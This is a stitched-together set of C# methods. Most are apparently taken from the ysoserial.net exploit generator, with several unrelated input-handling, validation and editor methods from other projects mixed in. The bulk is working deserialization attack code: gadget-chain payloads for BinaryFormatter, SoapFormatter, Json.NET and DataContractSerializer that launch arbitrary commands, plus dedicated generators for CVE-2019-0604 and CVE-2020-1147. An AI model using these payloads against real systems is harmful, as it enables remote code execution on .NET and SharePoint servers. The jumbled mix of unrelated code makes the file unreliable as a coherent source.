(!String.IsNullOrWhiteSpace(inputArgs.CmdFullString)) { byte[] osf = (byte[])new ActivitySurrogateSelectorFromFileGenerator().GenerateWithNoTest("SoapFormatter", inputArgs); payloadValue = Convert.ToBase64String(osf); } else { byte[] osf = (byte[])new ActivitySurrogateSelectorGenerator().GenerateWithNoTest("SoapFormatter", inputArgs); payloadValue = Convert.ToBase64String(osf); } break; } if (String.IsNullOrEmpty(payloadValue)) { Console.Write("ysoserial: "); Console.WriteLine("Incorrect plugin mode/arguments combination"); Console.WriteLine("Try 'ysoserial -p Resx --help' for more information."); System.Environment.Exit(-1); } if (mode.ToLower() != "compileddotresources") { payload = String.Format(payload, mtype, payloadValue); if (inputArgs.Minify) { payload = XMLMinifier.Minify(payload, null, null); } } if (inputArgs.Test) { try { if (mode.ToLower() != "compileddotresources") { using (TextReader sr = new StringReader(payload)) { var foo = new ResXResourceReader(sr); if (mode.ToLower() != "binaryformatter") { foo.GetEnumerator(); } } } else { ResourceSet myResourceSet = new ResourceSet(outputfile); } } catch { } } return(payload); }
public object Run(string[] args) { InputArgs inputArgs = new InputArgs(); List <string> extra; try { extra = options.Parse(args); inputArgs.Cmd = command; inputArgs.Minify = minify; inputArgs.UseSimpleType = useSimpleType; inputArgs.Test = test; } catch (OptionException e) { Console.Write("ysoserial: "); Console.WriteLine(e.Message); Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information."); System.Environment.Exit(-1); } object payload = ""; if (String.IsNullOrEmpty(command) || String.IsNullOrWhiteSpace(command)) { Console.Write("ysoserial: "); Console.WriteLine("Incorrect plugin mode/arguments combination"); Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information."); System.Environment.Exit(-1); } if (mode.ToLower().Equals("sessionstateitemcollection")) { /* I decided to change the TypeConfuseDelegateGenerator class and use its gadget instead of doing this through the following hacky way */ /* hacky way begin * byte[] tempPayload_init = (byte[])new TypeConfuseDelegateGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs); * byte[] tempPayload = new byte[tempPayload_init.Length + 1]; // adding one byte initially to fix the length problem * tempPayload_init.CopyTo(tempPayload, 0); * System.Web.SessionState.SessionStateItemCollection items = new System.Web.SessionState.SessionStateItemCollection(); * items[""] = tempPayload; * MemoryStream stream = new MemoryStream(); * BinaryWriter writer = new BinaryWriter(stream); * items.Serialize(writer); * stream.Flush(); * tempPayload = stream.ToArray(); * byte[] newSerializedData = new byte[tempPayload.Length-27-1-1]; // yes don't ask about the numbers! it's magical! * Array.Copy(tempPayload, 0, newSerializedData, 0, 9); // reading first 9 bytes * Array.Copy(tempPayload, 36, newSerializedData, 9, tempPayload.Length-27-1-9-1); // ignoring 27 bytes after 9 bytes + reading the rest + ignoring the last byte * newSerializedData[13] = 20; // for ReadByte - 20 is the type that will be deserialized in AltSerialization.ReadValueFromStream * // hacky way ends */ /* here it is using the sane way! */ object serializedData = (object)TypeConfuseDelegateGenerator.TypeConfuseDelegateGadget(inputArgs); System.Web.SessionState.SessionStateItemCollection items = new System.Web.SessionState.SessionStateItemCollection(); items[""] = serializedData; MemoryStream stream = new MemoryStream(); BinaryWriter writer = new BinaryWriter(stream); items.Serialize(writer); stream.Flush(); payload = stream.ToArray(); if (test) { // PoC on how it works in practice stream = new MemoryStream((byte[])payload); BinaryReader binReader = new BinaryReader(stream); System.Web.SessionState.SessionStateItemCollection test = System.Web.SessionState.SessionStateItemCollection.Deserialize(binReader); test.GetEnumerator(); } } else { // HttpStaticObjectsCollection byte[] serializedData = (byte[])new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs); byte[] newSerializedData = new byte[serializedData.Length + 7]; // ReadInt32 + ReadString + ReadBoolean + ReadByte serializedData.CopyTo(newSerializedData, 7); newSerializedData[0] = 1; // for ReadInt32 newSerializedData[5] = 1; // for ReadBoolean newSerializedData[6] = 20; // for ReadByte - 20 is the type that will be deserialized in AltSerialization.ReadValueFromStream payload = newSerializedData; if (test) { // PoC on how it works in practice try { MemoryStream stream = new MemoryStream((byte[])payload); BinaryReader binReader = new BinaryReader(stream); System.Web.HttpStaticObjectsCollection test = System.Web.HttpStaticObjectsCollection.Deserialize(binReader); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } } return(payload); }
public override object Generate(string formatter, InputArgs inputArgs) { Generator generator = new TextFormattingRunPropertiesGenerator(); byte[] binaryFormatterPayload = (byte[])generator.GenerateWithNoTest("BinaryFormatter", inputArgs); string b64encoded = Convert.ToBase64String(binaryFormatterPayload); if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) || formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase)) { var obj = new WindowsIdentityIdentityMarshal(b64encoded); return(Serialize(obj, formatter, inputArgs)); } else if (formatter.ToLower().Equals("json.net")) { string payload = @"{ '$type': 'System.Security.Principal.WindowsIdentity, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', 'System.Security.ClaimsIdentity.actor': '" + b64encoded + @"' }"; if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { payload = JSONMinifier.Minify(payload, new string[] { "mscorlib" }, null); } else { payload = JSONMinifier.Minify(payload, null, null); } } if (inputArgs.Test) { try { SerializersHelper.JsonNet_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("datacontractserializer")) { string payload = $@"<root type=""System.Security.Principal.WindowsIdentity, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""> <WindowsIdentity xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/System.Security.Principal""> <System.Security.ClaimsIdentity.actor i:type=""x:string"" xmlns="""">{b64encoded}</System.Security.ClaimsIdentity.actor> </WindowsIdentity> </root> "; if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { payload = XMLMinifier.Minify(payload, new string[] { "mscorlib" }, null); } else { payload = XMLMinifier.Minify(payload, null, null); } } if (inputArgs.Test) { try { SerializersHelper.DataContractSerializer_deserialize(payload, null, "root", "type"); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("netdatacontractserializer")) { string payload = $@"<root> <w xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" z:Type=""System.Security.Principal.WindowsIdentity"" z:Assembly=""mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" xmlns=""""> <System.Security.ClaimsIdentity.actor z:Type=""System.String"" z:Assembly=""0"" >{b64encoded}</System.Security.ClaimsIdentity.actor> </w> </root> "; if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { payload = XMLMinifier.Minify(payload, new string[] { "mscorlib" }, null); } else { payload = XMLMinifier.Minify(payload, null, null); } } if (inputArgs.Test) { try { SerializersHelper.NetDataContractSerializer_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("soapformatter")) { string payload = $@"<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC=""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""> <SOAP-ENV:Body> <a1:WindowsIdentity id=""ref-1"" xmlns:a1=""http://schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""> <System.Security.ClaimsIdentity.actor xsi:type=""xsd:string"" xmlns="""">{b64encoded}</System.Security.ClaimsIdentity.actor> </a1:WindowsIdentity> </SOAP-ENV:Body> </SOAP-ENV:Envelope> "; if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { payload = XMLMinifier.Minify(payload, new string[] { "mscorlib" }, null, FormatterType.SoapFormatter); } else { payload = XMLMinifier.Minify(payload, null, null, FormatterType.SoapFormatter); } } if (inputArgs.Test) { try { SerializersHelper.SoapFormatter_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else { throw new Exception("Formatter not supported"); } }
/// <summary> /// Submit this input, and tell me if its valid! /// </summary> /// <param name="input">An object containing input arguments</param> /// <returns>Answers if the input is valid or not</returns> public virtual bool SubmitInput(InputArgs input) { Contract.Requires(input is InputArgsSnowflakeScientific); var inp = (InputArgsSnowflakeScientific)input; float a, b, g, t, k, m, r, s; // validate input if (!IsFloat(inp.Alpha, out a) || !(AlphaMin <= a & a <= AlphaMax)) { Console.WriteLine("e0 " + a); return false; } // input is not valid if (!IsFloat(inp.Beta, out b) || !(BetaMin <= b & b <= BetaMax)) { Console.WriteLine("e1 " + b); return false; } // if (!IsFloat(inp.Gamma, out g) || !(GammaMin <= g & g <= GammaMax)) { Console.WriteLine("e2 " + g); return false; } // if (!IsFloat(inp.Theta, out t) || !(ThetaMin <= t & t <= ThetaMax)) { Console.WriteLine("e3 " + t); return false; } // if (!IsFloat(inp.Kappa, out k) || !(KappaMin <= k & k <= KappaMax)) { Console.WriteLine("e4 " + k); return false; } // if (!IsFloat(inp.Mu, out m) || !(MuMin <= m & m <= MuMax)) { Console.WriteLine("e5 " + m); return false; } // if (!IsFloat(inp.Rho, out r) || !(RhoMin <= r & r <= RhoMax)) { Console.WriteLine("e6 " + r); return false; } // if (!IsFloat(inp.Sigma, out s) || !(SigmaMin <= s & s <= SigmaMax)) { Console.WriteLine("e7 " + s); return false; } // // input is valid M.Reset(new DomainSnowflakeArgs { Rho = r, Beta = b, Alpha = a, Theta = t, Kappa = k, Mu = m, Gamma = g, Sigma = s }); UpdateViews(); return true; }
public object Run(string[] args) { InputArgs inputArgs = new InputArgs(); List <string> extra; try { extra = options.Parse(args); inputArgs.CmdFullString = command; inputArgs.Minify = minify; inputArgs.UseSimpleType = useSimpleType; inputArgs.Test = test; } catch (OptionException e) { Console.Write("ysoserial: "); Console.WriteLine(e.Message); Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information."); System.Environment.Exit(-1); } String payloadValue = ""; string payload = @"<ApplicationTrust version=""1"" TrustedToRun=""true""> <ExtraInfo Data=""{0}""> </ExtraInfo> <!-- the following commented tags can be enabled when needed--> <!-- <DefaultGrant> <PolicyStatement version=""1""> <PermissionSet class=""System.Security.PermissionSet"" version=""1""/> </PolicyStatement> </DefaultGrant> --> </ApplicationTrust> "; if (String.IsNullOrEmpty(command) || String.IsNullOrWhiteSpace(command)) { Console.Write("ysoserial: "); Console.WriteLine("Incorrect plugin mode/arguments combination"); Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information."); System.Environment.Exit(-1); } byte[] osf = (byte[])new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs); payloadValue = BitConverter.ToString(osf).Replace("-", string.Empty); payload = String.Format(payload, payloadValue); if (minify) { payload = XMLMinifier.Minify(payload, null, null); } if (test) { // PoC on how it works in practice try { System.Security.SecurityElement malPayload = System.Security.SecurityElement.FromString(payload); System.Security.Policy.ApplicationTrust myApplicationTrust = new System.Security.Policy.ApplicationTrust(); myApplicationTrust.FromXml(malPayload); Console.WriteLine(myApplicationTrust.ExtraInfo); } catch { } } return(payload); }
private static bool TryReadMessage(WindowMessage message, IntPtr data, out InputArgs inputArgs) { return(message.IsMouseMessage() ? TryReadMouseMessage(message, data, out inputArgs) : Env.Config.KeyboardLayout.TryReadKeyboardMessage(message, data, out inputArgs)); }
public string CVE_2019_0604() { /* * string payloadPart2 = @"<ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema""> * <ExpandedElement/> * <ProjectedProperty0> * <MethodName>Parse</MethodName> * <MethodParameters> * <anyType xsi:type=""xsd:string""> * <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">"+ cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]> * </anyType> * </MethodParameters> * <ObjectInstance xsi:type=""XamlReader""></ObjectInstance> * </ProjectedProperty0> * </ExpandedWrapperOfXamlReaderObjectDataProvider>"; * //*/ string payloadPart1 = ""; string payloadPart2 = ""; if (useurl) { InputArgs inputArgs = new InputArgs(); inputArgs.Cmd = "foobar"; inputArgs.IsRawCmd = true; inputArgs.ExtraInternalArguments = new List <String> { "--variant", "3", "--xamlurl", cmd }; inputArgs.Minify = true; inputArgs.UseSimpleType = true; payloadPart1 = typeof(Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties).AssemblyQualifiedName + ":"; payloadPart1 = payloadPart1.Replace(" ", ""); TextFormattingRunPropertiesGenerator myTFRPG = new TextFormattingRunPropertiesGenerator(); payloadPart2 = (string)myTFRPG.GenerateWithNoTest("DataContractSerializer", inputArgs); } else { payloadPart1 = @"System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35]],System.Data.Services,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089:"; Boolean hasArgs; string[] splittedCMD = CommandArgSplitter.SplitCommand(cmd, CommandArgSplitter.CommandType.XML, out hasArgs); String cmdPart; if (hasArgs) { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{splittedCMD[0]}</b:String><b:String>{splittedCMD[1]}</b:String>"; } else { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{splittedCMD[0]}</b:String>"; } payloadPart2 = @"<ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:a=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:b=""http://www.w3.org/2001/XMLSchema""><ExpandedElement/><ProjectedProperty0><MethodName>Parse</MethodName><MethodParameters><anyType a:type=""b:string""><![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">" + cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]></anyType></MethodParameters><ObjectInstance a:type=""XamlReader""/></ProjectedProperty0></ExpandedWrapperOfXamlReaderObjectDataProvider>"; } //payloadPart2 = PayloadMinifier(payloadPart2); // we need to make it smaller as goes bigger after encoding payloadPart2 = XMLMinifier.Minify(payloadPart2, null, null, FormatterType.DataContractXML, true); //Console.WriteLine(payloadPart2); string payload = payloadPart1 + payloadPart2; Console.WriteLine(payload); StringBuilder stringBuilder = new StringBuilder(); stringBuilder.Append("__bp"); HexEncode(checked ((char)(payload.Length << 2)), stringBuilder); HexEncode(payload, stringBuilder); return(stringBuilder.ToString()); }
public override object Generate(string formatter, InputArgs inputArgs) { return(Serialize(TypeConfuseDelegateGadget(inputArgs), formatter, inputArgs)); }
/// <inheritdoc/> public void LeftUp(InputArgs args) => _editor?.CurrentTool?.LeftUp(args);
public override object Generate(string formatter, InputArgs inputArgs) { throw new NotImplementedException(); }
/// <inheritdoc/> public void Move(InputArgs args) => _editor?.CurrentTool?.Move(args);
/// <summary> /// Submit this input, and tell me if its valid! /// </summary> /// <param name="input">An object containing input arguments</param> /// <returns>Answers if the input is valid or not</returns> public override bool SubmitInput(InputArgs input) { Contract.Requires(input is InputArgsSnowflakePersonal); var inp = (InputArgsSnowflakePersonal)input; //Console.WriteLine(inp.FirstName + "\n" + inp.LastName + "\n" + inp.Birthday + "\n" + inp.LuckyNumber + "\n" + inp.Blah1 + "\n" + inp.Blah2); // validate input if (inp.FirstName.Length < 1 | inp.LastName.Length < 1 | inp.LuckyNumber.Length < 1 | inp.Blah1.Length < 1 | inp.Blah2.Length < 1) return false; // input is not valid if (!Regex.Match(inp.Birthday, @"^(0[1-9]|[12][0-9]|3[01])/(0[1-9]|1[012])/(19|20)\d\d$").Success) return false; // input is not valid float bd0, bd1, bd2; var bd = inp.Birthday.Split('/'); if (!IsFloat(bd[0], out bd0)) return false; // input is not valid if (!IsFloat(bd[1], out bd1)) return false; // if (!IsFloat(bd[2], out bd2)) return false; // // input is valid float a = StringToFloat(inp.FirstName) * (AlphaMax - AlphaMin) + AlphaMin; float b = StringToFloat(inp.FirstName) * (BetaMax - BetaMin) + BetaMin; float g = bd0 / 31 * (GammaMax - GammaMin) + GammaMin; float t = bd1 / 12 * (ThetaMax - ThetaMin) + ThetaMin; float k = bd2 / 2100 * (KappaMax - KappaMin) + KappaMin; float m = StringToFloat(inp.LuckyNumber) * (MuMax - MuMin) + MuMin; float r = StringToFloat(inp.Blah1) * (RhoMax - RhoMin) + RhoMin; float s = StringToFloat(inp.Blah2) * (SigmaMax - SigmaMin) + SigmaMin; Console.WriteLine("a: " + a + "\nb: " + b + "\ng: " + g + "\nt: " + t + "\nk: " + k + "\nm: " + m + "\nr: " + r + "\ns: " + s); // input is valid this.M.Reset(new DomainSnowflakeArgs { Rho = r, Beta = b, Alpha = a, Theta = t, Kappa = k, Mu = m, Gamma = g, Sigma = s }); return true; }
/// <inheritdoc/> public void LeftUp(InputArgs args) => CurrentTool.LeftUp(args);
public string CVE_2020_1147() { InputArgs inputArgs = new InputArgs(); inputArgs.Cmd = command; inputArgs.IsRawCmd = true; inputArgs.Minify = false; // minimisation of payload is not important here but we can do it if needed! inputArgs.UseSimpleType = false; // minimisation of payload is not important here but we can do it if needed! string formatter = "losformatter"; string losFormatterPayload = ""; var types = AppDomain.CurrentDomain.GetAssemblies().SelectMany(s => s.GetTypes()); // Populate list of available gadgets var generatorTypes = types.Where(p => typeof(IGenerator).IsAssignableFrom(p) && !p.IsInterface); var generators = generatorTypes.Select(x => x.Name.Replace("Generator", "")).ToList(); if (!generators.Contains(gadget)) { Console.WriteLine("Gadget not supported."); System.Environment.Exit(-1); } // Instantiate Payload Generator IGenerator generator = null; try { var container = Activator.CreateInstance(null, "ysoserial.Generators." + gadget + "Generator"); generator = (IGenerator)container.Unwrap(); } catch { Console.WriteLine("Gadget not supported!"); System.Environment.Exit(-1); } // Check Generator supports specified formatter if (generator.IsSupported(formatter)) { losFormatterPayload = System.Text.Encoding.ASCII.GetString((byte[])generator.GenerateWithNoTest(formatter, inputArgs)); } else { Console.WriteLine("LosFormatter not supported."); System.Environment.Exit(-1); } string payload = @"<DataSet> <xs:schema xmlns="""" xmlns:xs=""http://www.w3.org/2001/XMLSchema"" xmlns:msdata=""urn:schemas-microsoft-com:xml-msdata"" id=""somedataset""> <xs:element name=""somedataset"" msdata:IsDataSet=""true"" msdata:UseCurrentLocale=""true""> <xs:complexType> <xs:choice minOccurs=""0"" maxOccurs=""unbounded""> <xs:element name=""Exp_x0020_Table""> <xs:complexType> <xs:sequence> <xs:element name=""pwn"" msdata:DataType=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"" type=""xs:anyType"" minOccurs=""0""/> </xs:sequence> </xs:complexType> </xs:element> </xs:choice> </xs:complexType> </xs:element> </xs:schema> <diffgr:diffgram xmlns:msdata=""urn:schemas-microsoft-com:xml-msdata"" xmlns:diffgr=""urn:schemas-microsoft-com:xml-diffgram-v1""> <somedataset> <Exp_x0020_Table diffgr:id=""Exp Table1"" msdata:rowOrder=""0"" diffgr:hasChanges=""inserted""> <pwn xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema""> <ExpandedElement/> <ProjectedProperty0> <MethodName>Deserialize</MethodName> <MethodParameters> <anyType xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xsi:type=""xsd:string"">" + losFormatterPayload + @"</anyType> </MethodParameters> <ObjectInstance xsi:type=""LosFormatter""></ObjectInstance> </ProjectedProperty0> </pwn> </Exp_x0020_Table> </somedataset> </diffgr:diffgram> </DataSet>"; // minimisation of payload is not important here but we can do it if needed! return(payload.Replace("+", "%2B").Replace("&", "%26")); // POST body safe (minimal url-encoding) }
public override object Generate(string formatter, InputArgs inputArgs) { IGenerator generator = new TextFormattingRunPropertiesGenerator(); byte[] binaryFormatterPayload = (byte[])generator.GenerateWithNoTest("BinaryFormatter", inputArgs); string b64encoded = Convert.ToBase64String(binaryFormatterPayload); if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) || formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase)) { Object obj = null; if (variant_number == 2) { obj = new WindowsClaimsIdentityMarshal_var2(b64encoded); } else if (variant_number == 3) { obj = new WindowsClaimsIdentityMarshal_var3(b64encoded); } else { obj = new WindowsClaimsIdentityMarshal_var1(b64encoded); } return(Serialize(obj, formatter, inputArgs)); } else if (formatter.ToLower().Equals("json.net")) { string payload = ""; if (variant_number == 2) { payload = @"{ '$type': 'Microsoft.IdentityModel.Claims.WindowsClaimsIdentity, Microsoft.IdentityModel,Version=3.5.0.0,PublicKeyToken=31bf3856ad364e35', 'System.Security.ClaimsIdentity.bootstrapContext': '" + b64encoded + @"' }"; } else { payload = @"{ '$type': 'Microsoft.IdentityModel.Claims.WindowsClaimsIdentity, Microsoft.IdentityModel,Version=3.5.0.0,PublicKeyToken=31bf3856ad364e35', 'System.Security.ClaimsIdentity.actor': '" + b64encoded + @"' }"; } if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { payload = JSONMinifier.Minify(payload, new string[] { "Microsoft.IdentityModel" }, null); } else { payload = JSONMinifier.Minify(payload, null, null); } } if (inputArgs.Test) { try { SerializersHelper.JsonNet_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("datacontractserializer")) { string payload = ""; if (variant_number == 2) { payload = $@"<root type=""Microsoft.IdentityModel.Claims.WindowsClaimsIdentity, Microsoft.IdentityModel, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35""> <WindowsClaimsIdentity xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/Microsoft.IdentityModel.Claims""> <System.Security.ClaimsIdentity.bootstrapContext i:type=""x:string"" xmlns="""">{b64encoded}</System.Security.ClaimsIdentity.bootstrapContext> </WindowsClaimsIdentity> </root>"; } else { payload = $@"<root type=""Microsoft.IdentityModel.Claims.WindowsClaimsIdentity, Microsoft.IdentityModel, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35""> <WindowsClaimsIdentity xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/Microsoft.IdentityModel.Claims""> <System.Security.ClaimsIdentity.actor i:type=""x:string"" xmlns="""">{b64encoded}</System.Security.ClaimsIdentity.actor> </WindowsClaimsIdentity> </root>"; } if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { payload = XMLMinifier.Minify(payload, new string[] { "Microsoft.IdentityModel" }, null); } else { payload = XMLMinifier.Minify(payload, null, null); } } if (inputArgs.Test) { try { SerializersHelper.DataContractSerializer_deserialize(payload, null, "root", "type"); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("netdatacontractserializer")) { string payload = ""; if (variant_number == 2) { payload = $@"<root> <w xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" z:Type=""Microsoft.IdentityModel.Claims.WindowsClaimsIdentity"" z:Assembly=""Microsoft.IdentityModel,Version=3.5.0.0,PublicKeyToken=31bf3856ad364e35"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" xmlns=""""> <System.Security.ClaimsIdentity.actor z:Type=""System.String"" z:Assembly=""0"">{b64encoded}</System.Security.ClaimsIdentity.actor> </w> </root> "; } else if (variant_number == 3) { payload = $@"<root> <w xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" z:Type=""Microsoft.IdentityModel.Claims.WindowsClaimsIdentity"" z:Assembly=""Microsoft.IdentityModel,Version=3.5.0.0,PublicKeyToken=31bf3856ad364e35"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" xmlns=""""> <System.Security.ClaimsIdentity.bootstrapContext z:Type=""System.String"" z:Assembly=""0"">{b64encoded}</System.Security.ClaimsIdentity.bootstrapContext> </w> </root> "; } else { payload = $@"<root> <w xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" z:Type=""Microsoft.IdentityModel.Claims.WindowsClaimsIdentity"" z:Assembly=""Microsoft.IdentityModel,Version=3.5.0.0,PublicKeyToken=31bf3856ad364e35"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" xmlns=""""> <_actor z:Type=""System.String"" z:Assembly=""0"" >{b64encoded}</_actor> <m_userToken z:Type=""System.IntPtr"" z:Assembly=""0"" xmlns=""""> <value z:Type=""System.Int64"" z:Assembly=""0"">0</value> </m_userToken> <_label i:nil=""true""/> <_nameClaimType i:nil=""true""/> <_roleClaimType i:nil=""true""/> </w> </root> "; } if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { payload = XMLMinifier.Minify(payload, new string[] { "Microsoft.IdentityModel" }, null); } else { payload = XMLMinifier.Minify(payload, null, null); } } if (inputArgs.Test) { try { SerializersHelper.NetDataContractSerializer_deserialize(payload, "root"); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else if (formatter.ToLower().Equals("soapformatter")) { string payload = ""; if (variant_number == 2) { payload = $@"<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC=""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""> <SOAP-ENV:Body> <a1:WindowsClaimsIdentity id=""ref-1"" xmlns:a1=""http://schemas.microsoft.com/clr/nsassem/Microsoft.IdentityModel.Claims/Microsoft.IdentityModel, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35""> <System.Security.ClaimsIdentity.bootstrapContext xsi:type=""xsd:string"" xmlns="""">{b64encoded}</System.Security.ClaimsIdentity.bootstrapContext> </a1:WindowsClaimsIdentity> </SOAP-ENV:Body> </SOAP-ENV:Envelope> "; } else { payload = $@"<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC=""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""> <SOAP-ENV:Body> <a1:WindowsClaimsIdentity id=""ref-1"" xmlns:a1=""http://schemas.microsoft.com/clr/nsassem/Microsoft.IdentityModel.Claims/Microsoft.IdentityModel, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35""> <System.Security.ClaimsIdentity.actor xsi:type=""xsd:string"" xmlns="""">{b64encoded}</System.Security.ClaimsIdentity.actor> </a1:WindowsClaimsIdentity> </SOAP-ENV:Body> </SOAP-ENV:Envelope> "; } if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { payload = XMLMinifier.Minify(payload, new string[] { "Microsoft.IdentityModel" }, null, FormatterType.SoapFormatter); } else { payload = XMLMinifier.Minify(payload, null, null, FormatterType.SoapFormatter); } } if (inputArgs.Test) { try { SerializersHelper.SoapFormatter_deserialize(payload); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(payload); } else { throw new Exception("Formatter not supported"); } }
public virtual bool ProcessEvent(InputArgs args) { return Input.ProcessInput(args) || Entities.Iterate().Any(e => e.Input.ProcessInput(args)); }
void GotKeyEvent(object sender, InputArgs e) { for (int i = 0; i < e.args.Count; i++) { if (e.args[i].IsUpDownEvent) HandleOtherKey(e.args[i]); // Special keys else AddChar(e.args[i].Character); // Character keys } }
